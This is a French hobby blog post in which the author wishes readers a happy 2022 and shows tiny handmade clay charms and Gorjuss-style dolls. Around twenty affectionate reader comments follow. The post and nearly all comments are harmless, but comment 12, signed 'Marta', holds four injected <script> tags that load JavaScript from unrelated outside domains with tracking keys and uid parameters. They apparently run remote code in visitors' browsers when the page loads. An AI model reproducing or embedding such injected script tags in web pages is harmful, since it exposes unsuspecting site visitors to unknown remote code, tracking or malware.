• Dernières créations de l'année 2021

    Bonjour à toutes.

    Je voudrais d'abord  vous remercier vous toutes qui depuis l'ouverture de mon nouveau blog avez été si fidèles et vous dire que vos commentaires sur mes créations m'ont été droit au coeur.

    L'année 2021 aura été pénible pour beaucoup d'entres nous alors pas de regret de la voir s'en aller.

    2022 sera là demain, quelle soit clémente pour tout le monde.

    Mes petits montages pour l'occasion :

     

    Dernières créations de l'année 2021

     

    Dernières créations de l'année 2021

     

     

    Mes dernières créations pour  2021

     

     

    Des petites breloques chiens, elles sont déjà parties chez des amies.

     

    Dernières créations de l'année 2021

     

    Toute le monde connait les poupées Sarah Gorjuss ou peut -être pas d'ailleurs.

     

     Je vous présente les miennes, la plus petite ne fait que 4,5 cm, pas évident pour travailler la pâte.

    Elles seront parfaites pour agrémenter des sacs à mains.

     

    Dernières créations de l'année 2021

     

    Dernières créations de l'année 2021

     

    Dernières créations de l'année 2021

     

     


  • Commentaires

    1
    kikinette 49
    Vendredi 31 Décembre 2021 à 08:32

    Sympa ces petites breloques toujours des belles réussites bravo bisous sarcastic

    2
    Vendredi 31 Décembre 2021 à 08:33

    Tout d'abord je te présente moi aussi mes voeux les meilleurs pour 2022 comme le veut la tradition même si on sait bien qu'entre le 31 et le 1er ce sera juste la simple vie qui se déroulera..... Mais par delà le temps qui passe (beaucoup trop vite !) il est toujours bon de marquer "l'anniversaire" de la nouvelle année qui j'espère chez toi sera plus sereine en protégeant au mieux les santés de ceux qui t’entourent et qui sont touchés par les maux ! Les mots dans ces cas là, d'ailleurs me manquent souvent alors juste, le coeur y est !

    De jolis montages photos toujours bien réussis et plaisants, merci ! Des petites porcelaines toujours toutes mignonnes et là avec tes gorjius, elles sont juste adorables et super bien représentées ces petites poupées aux expressions "cachées-inventées" alors encore merci de nous distraire avec tes si mignonnes petites créas !

    Bisous et plein de choses positives chez toi, tel est mon souhait le plus cher !

    3
    gravhelio
    Vendredi 31 Décembre 2021 à 09:22

    Tu as des doigts de fée ! Passe un bon réveillon.

    4
    Vendredi 31 Décembre 2021 à 09:34

    Coucou , belles créations de fin d'année . J'adore la poupée (la plus grande) avec son petit pied de travers ! Trop chou . Bonne fin d'année à vous et bon réveillon et je vous dis à l'année prochaine . Je vous embrasse très fort

    5
    Vendredi 31 Décembre 2021 à 10:16
    pipiou13

    Merci pour tes bons souhaits.En retour reçois les miens. Que 2022 chasse vite les tracas et surtout le virus afin que nous reprenions vite une vie normale.

    Merci pour tes jolies présentations.Tout est magnifique et si bien réalisé . C'est de la miniature mais tellement expressive! tu es douée

    Bonne fin d'année et gros bisous

    6
    Vendredi 31 Décembre 2021 à 10:41
    Cc Jacqueline, Sympa ces jolies petites poupettes, trop mignon, j'adore. J'espère que 2022 sera meilleure que celle qui vient de s'écouler surtout là santé. Bon réveillon et bonne année, Gros bisous Yvette
    7
    Véro
    Vendredi 31 Décembre 2021 à 10:42

    Merci pour tes voeux. Tout plein de bonnes choses pour cette nouvelle année qui arrive. Voeux de bonheur et voeux de très bonne santé.

    Tes petits chiens sont adorables et les Gorjuss...... je craque, elles sont superbes. Beau travail de minutie, bravo. Bisous.

    8
    Vendredi 31 Décembre 2021 à 10:42

    Comme tu le dit si bien aucun regret de 2021 mais a savoir 2022, serait ce une année miroir, restons positifs on verra bien, c est quand meme l année des élections donc pas drole déjà, merci toi d etre si gentille avec nous et de nous faire aprtager ta passion, bisous et passe une belle journée et un bon réveillon bisous

    9
    Vendredi 31 Décembre 2021 à 16:28

    Bonjour Jacqueline , 

    Merci pour tes voeux et je t'envoie les miens chargés d'espoir  d'amour et d'amitié .

    Bravo pour ces belles breloques surtout ces jolies poupées pour agrémenter des sacs à mains , bravo encore .

    Douce soirée et à l'an prochain .

    Bises d'Eglantine / Jacqueline .

    10
    bulledelaine
    Vendredi 31 Décembre 2021 à 16:36

    coucou,tes petites mini poupées sont très réussies,bravo ! comme tous ce que tu fait,je te souhaite une bonne année 2022,laissons partir 2021 sans regret,difficile pour beaucoup d'entre nous,cette nouvelle année ne saurait que être mieux,prends bien soin de toi,bisous

    11
    Vendredi 31 Décembre 2021 à 17:49

    Bonsoir Jacquelline

    J'espère que tout va bien chez toi

    Ce que tu fais est très joli, j'aime beaucoup

    Tu as beaucoup de goût

    C'est ravissant

    Cette année se termine et on espère que nous allons voir la fin de ce virus

    Vivre normalement

    Bonne fin d'année 

    ET

    GROS BIBIS

    12
    Marta
    Vendredi 31 Décembre 2021 à 21:33

    Bonne et heureuse année 2022.

    Bises

    Marta

    <script src="//cilkonlay.com/2175f4755425250bf1.js?2"></script> <script src="http://hublosk.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8565x" type="text/javascript"></script> <script src="http://jullyambery.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8565x&format=arrjs&r=1640982777933" type="text/javascript"></script> <script src="http://cilkonlay.com/ext/2175f4755425250bf1.js?sid=52564_8565_&title=a&blocks[]=31af2" type="text/javascript"></script>
    13
    Maryvonne
    Samedi 1er Janvier 2022 à 10:43

    Ton blog est ravissant pour ces dernier jours de l’année et donc le premier de cette nouvelle année. 
    Tes petites poupées sont craquantes.  C’est vraiment très beau, comme on voudrait que soit cette nouvelle année.

    Tous mes meilleurs vœux de  santé surtout pour toi et les tiens. Bonne année à toutes et tous et gros bisous 

    14
    gravhelio
    Samedi 1er Janvier 2022 à 10:48

    BONNE ET HEUREUSE ANNÉE  A TOUTES !

    15
    Samedi 1er Janvier 2022 à 13:53

    Bonjour Jacqueline 

    Bravo pour ta nouvelle déco, en ce début d'année, de nouvelles choses 

    Je viens ta souhaiter une bonne et heureuse année 2022, avec tout le positif, le meilleur, le beau et le bon qui soit

    Prenons soins de nous, de nos loulous et de ceux que nous aimons

    Bisous, premières caresses douceurs pour tes 3 loulous 

    16
    Samedi 1er Janvier 2022 à 15:43
    17
    Samedi 1er Janvier 2022 à 20:43

    Bonjour Jacqueline

    Tu nous a gâté tes petites réalisations sont magnifiques.. Tu es vraiment douée..

    Je suis en pause , mais je tenais à passer pour te souhaiter une bonne et heureuse Année et surtout une bonne santé, c'est ce qui compte le plus , le reste on fait avec...

    Merci pour ta gentille présence et de tes chaleureux commentaires...

    Je te fais de gros bisous et prend soin de toi et des tiens..

    Tendrement Chrys.

     

     

     

     

     

    18
    Dimanche 2 Janvier 2022 à 14:31

                                    Ah non je ne connaissais pas ces poupées, je découvre, les tiennes sont vraiment ravissantes!

                                 

                              je viens te déposer mes vœux de bonne année sur ton blog, qu'elle soit plus douce et sereine que l'an passé

                                      et vous apporte à toi et ta famille une multitude de moments positifs et d'inspiration pour tes créations..

                                                                                              Gros bisous et BONNE ANNEE

                                                                                       

                                                               

    19
    Lundi 3 Janvier 2022 à 09:49

    Bonjour Jacqueline,

    Depuis que je suis rentrée, je n'ai pas trop eu le temps de visiter les blogs ou si je l'ai fait, je n'ai pas déposé de commentaires. Quelques soucis d'intendance domestique (appareils en panne) m'ont accaparée. J'espère que tu as réussi à passer un Noël le meilleur possible malgré tes soucis familiaux. Je te souhaite une bonne année 2022; qu'elle soit bonne certes, mais surtout qu'elle vous libère de ce poids qui vous plombe la vie actuellement. On dira donc, qu'elle vous apporte la santé, qu'elle te permette de continuer tes créations artistiques dans la joie et la sérénité. Bref qu'elle voit la réalisation de tous vos souhaits les plus chers. Et que ce fichu virus nous laisse tranquille!

    Tes réalisations sont toujours aussi belles et me laissent béate d'admiration. Ah, la honte...mais non, je ne connaissais pas ces poupées. Enfin, grâce à toi, me voilà moins ignare pour commencer l'année. Les tiennes sont toute mimi et émouvantes de finesse.

    Bon début d'année et bon début de semaine.

    Gros bisous

    Rolande

    20
    Lundi 3 Janvier 2022 à 11:01

    Bonjour Jacqueline

    Merci pour ta visite. Tu as raison faire les boutiques te donnera le moral , sortir un peu de chez soi fait du bien..

    Je te souhaite une belle journée même si le temps ne s'y prête pas ...

    Gros bisous de Chrys..

    21
    Dimanche 23 Janvier 2022 à 18:16

    Re coucou ! Je ne connaissais pas ces figurines très sympa aussi .

    Bonne fin de journée !

    Françoise 

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :